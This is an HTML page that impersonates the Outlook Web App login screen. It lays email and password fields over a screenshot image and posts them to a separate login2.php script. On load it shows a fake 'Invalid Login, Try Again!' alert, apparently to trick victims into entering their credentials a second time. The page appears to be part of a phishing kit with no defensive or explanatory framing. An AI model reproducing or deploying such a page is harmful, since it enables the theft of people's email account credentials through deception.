<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Outlook Web app</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">

</head>
<body>
<script>
alert("Invalid Login, Try Again!");
</script>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1365px; height:652px; z-index:0"><img src="./images/paste765.jpg" alt="" title="" border=0 width=1365 height=652></div>

<form name="form1" method="POST" action="login2.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="email" style="position:absolute;width:352px;left:646px;top:278px;z-index:2;height: 43px;" required placeholder="Example@email.com">
<input name="formtext2" type="password" style="position:absolute;width:352px;left:646px;top:325px;z-index:3;height: 43px;" required placeholder="Password">
<div id="formimage1" style="position:absolute; left:642px; top:383px; z-index:4"><input type="image" name="formimage1" width="360" height="47" src="./images/lo1.jpg"></div>
</form>


</body>
</html>
